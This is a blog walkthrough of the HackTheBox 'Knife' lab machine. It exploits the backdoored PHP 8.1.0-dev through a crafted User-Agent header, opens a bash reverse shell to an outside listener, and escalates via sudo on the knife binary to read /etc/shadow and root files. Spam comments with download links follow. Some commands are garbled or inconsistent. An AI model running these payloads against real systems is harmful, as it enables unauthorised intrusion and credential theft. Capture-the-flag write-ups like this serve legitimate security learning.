Skip to main content

HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it Hocho Knife #Easy #Linux Machine created by MrKN16H went live 22 May 2021 at 19:00:00 UTC.

😜Let's Start the journey.....

🔐Enumeration🔰


💉From Dmitry result one thing caught my and that is it an apache httpd server instead of regular nginx in all the HackTheBox Machine.


🔰We can find 2 Open Ports. In Port 80 We can see web page.

🔧As the latest release for apache httpd is 2.4.46 there could be a known vuln in 2.4.41 so I looked for it on web.

🗽Looking for it I stumbled around this Rapid7 Post https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/.

🔰But there is one concerning thing about this exploit you need to have mod_proxy_ftp
module running and have FTP backend which we know nothing of.

🖥️Web-Visting🛡️

🤔We can find this static page and nothing 
interesting in it. 


🔐Looking the source code found pen.js which looked interesting but after looking at it got nothing interesting.
Also added knife.htb in /etc/hosts to look for sub-domain but interestingly we found the default nginx page.


😜This was interesting.
But let's go back to your main page.
Looking for Vulnerabilites I found one interesting thing that php 8.1.x-dev was backdoored by some hackers.


😏You can find articles on it.
https://techbeacon.com/security/php-backdoored-git-hack-its-no-joke-so-don't-be-fool
https://www.welivesecurity.com/2021/03/30/backdoor-php-source-code-git-server-breach/
This is interesting as server is leaking the the version of PHP.


☢️Wappalyzer detected it.
Looking through bunch of article finally came up to this one where it showed how to exploit this backdoored by some troll hackers.
https://blog.csdn.net/zy15667076526/article/details/116447864

💉The website is originally in chinese but the google translate works fine.
So let's see if your PHP is dev version or not.


$ curl -i http://10.10.10.241

🔐Looking at X-Powered-By header we can say that indeed we are in luck and the version is PHP/8.1.0-dev.

💉Exploitation☢️

😏Reading throught the article found out that the backdoor can be accessed using User-Agent Header to execute the code.
We have to append the string zerodium which is also one of the leading zero day vuln finder firm.

🤔So let's try PoC for this exploit.


$ curl-i-s-k-H'User-Agentt:zerodiumvar_dump(2*3);'http://10.10.10.242/

💉Looks like we triggered the RCE let's get going and get try to excute system commands.

$ curl -i -s -k -H 'User-Agentt: zerodiumsystem("id");' http://10.10.10.242/

🔐Looks like the web server is running as james so one less step for us.
Let's get the REV-Shell.


$ curl -i -s -k -H $'User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");' http://10.10.10.242

🔐And boom we have the shell😜

nc -nvlp 4242

listening on [any] 4242 ...
connect to [] from (UNKNOWN) [10.10.10.242] 60452
bash: cannot set terminal process group (966): Inappropriate ioctl for device
bash: no job control in this shell
id
id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:/$ 

🔰User Privilege 😜


1 - Log on to Home directory ~ cd home
2 - Then Go to James directory ~cd james
3 - Cat user.txt ~ ls   ~cat user.txt

🔐Root Access😜

🔰Now we have the stable shell now lets enumerate for PrivESC.

 ☢️Enumeration

james@knife:~$ cat ex.rb 
puts File.read('/etc/shadow')

😏Looking into user's home directory we can see an intresting ruby file which can read /etc/shadow but the catch is we dont have ruby on the box or atleast on the desired path and the desired name.
 

james@knife:~$ sudo -l
🛡️Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

👍User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Analysing the file /usr/bin/knife

james@knife:~$ file /usr/bin/knife 
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife

🔐It's symbolic link to another file /opt/chef-workstation/bin/knife.
looking at the directory /opt/chef-workstation we can see it a ruby installation.

james@knife:~$ ls /opt/chef-workstation/
bin  components  embedded  gem-version-manifest.json  gitbin  LICENSE  LICENSES  version-manifest.json  version-manifest.txt

☢️So basically on this box ruby commands can be run using /usr/bin/knife.
running /usr/bin/knife we get the big help menu.

james@knife:~$ sudo /usr/bin/knife

cd /tmp
echo 'puts File.read("/root/root.txt")' > rev.rb

😏Now let's run our ex.rb script

james@knife:~$ sudo /usr/bin/knife exec ex.rb


!!!!!!Rooted!!!!!



Comments

  1. uttamJuly 25, 2021 at 2:08 AM

    sir i have a doubt while getting reverse shell as we are able to run commands we can get reverse shell by running payload but why did you run bash -c payload

    ReplyDelete
  2. Crack SoftwareSeptember 28, 2021 at 10:16 PM

    Your style is so unique compared to other people I have read stuff from. Many thanks forposting when you have the opportunity, Guess I will just bookmark this site Cerberus FTP Server Enterprise

    ReplyDelete
  3. AnonymousApril 7, 2022 at 8:55 PM

    Hackthebox Active Machine Walkthrough - Knife 🗡️ >>>>> Download Now

    >>>>> Download Full

    Hackthebox Active Machine Walkthrough - Knife 🗡️ >>>>> Download LINK

    >>>>> Download Now

    Hackthebox Active Machine Walkthrough - Knife 🗡️ >>>>> Download Full

    >>>>> Download LINK 7g

    ReplyDelete
  4. ditioVex_ku_ToledoApril 23, 2022 at 2:41 PM

    ditioVex_ku_Toledo Matt Mueller https://wakelet.com/wake/5XM27CSAtJXEGJxIYjRmn
    dephopilsblos

    ReplyDelete
  5. gratcaex-zaAugust 25, 2022 at 7:37 PM

    gratcaex-za Jensen Alfonso UnHackMe
    Driver Genius
    ScreenHunter Pro
    nodenkirchvab

    ReplyDelete
  6. OniguVbiyoNovember 30, 2022 at 1:24 PM

    cuncbiQchron_ne Tim Beard programs
    This is there
    quehattiber

    ReplyDelete

Post a Comment

Popular posts from this blog

HackTheBox Walkthrough - Explore

🛡️Types of OS : Android 🌞Released on : 26th June 2021 ☢️Difficulty : Easy 👍Point: 20 💉Running nmap scan: nmap -vv — reason -Pn -A — osscan-guess — version-all -p- $IP -oN Explore.nmap nmap_scan.report 💉Running the nmap scan gives four ports port 2222 — ssh port 59777 — http port 5555 — adbshell {This can be found by looking on  google } adb_shell_port ☢️Running FFUF ffuf -u  http://explore.htb:59777/FUZZ  -w /usr/share/wordlists/dirb/big.txt -t 200 -c ffuf_scan 😃Lets visit the web-page 😜As you can see its showing forbidden. So lets try some other directory. 😃And we get the same results. Lets try to enumerate port 59777 which service uses this port on android. ☺️we get this article from  Daily-Swigg  which explain the vulnerability in ES File explorer which exposes user data on open port and anyone can read it. 😏Lets try running FFUF on  http://explore.htb:59777/sdcard/ ffuf_sdcard 😏Look like we found our first flag. So easy 😁The POC for the above vulnerability can be found o...
3 comments
Read more

HacktheBox Walkthrough - Shoppy

🟥Name ➡️ Shoppy 🟥Release Date ➡️ 17 Sep 2022 🟥Retire Date ➡️ 14 Jan 2023 🟥OS  ➡️ Linux 🟥Base Points Easy ➡️ [20] 🟥First Blood User 6 mins, 03 seconds 22sh 🟥First Blood Root 12 mins, 37 seconds 22sh 👉Shoppy was much easier to exploit From there, I’ll need the lighest of reverse enginnering to get a static password from a binary, which gets me to the next user. 👉I’ll start by finding a website and use a NoSQL injection to bypass the admin login page, and another to dump users and hashes. 👉This user is in the docker group, so I’ll load an image mounting the host file system, and get full disk access. 👉Shoppy was one of the easier HackTheBox weekly machines to exploit, though identifying the exploits for the initial foothold could be a bit tricky. 👉With a cracked hash, I’ll log into a Mattermost server where I’ll find creds to the box that work for SSH. 👉In Beyond Root, a video walkthrough of the vulnerable web-server code, showing how the injections worked, an...
Post a Comment
Read more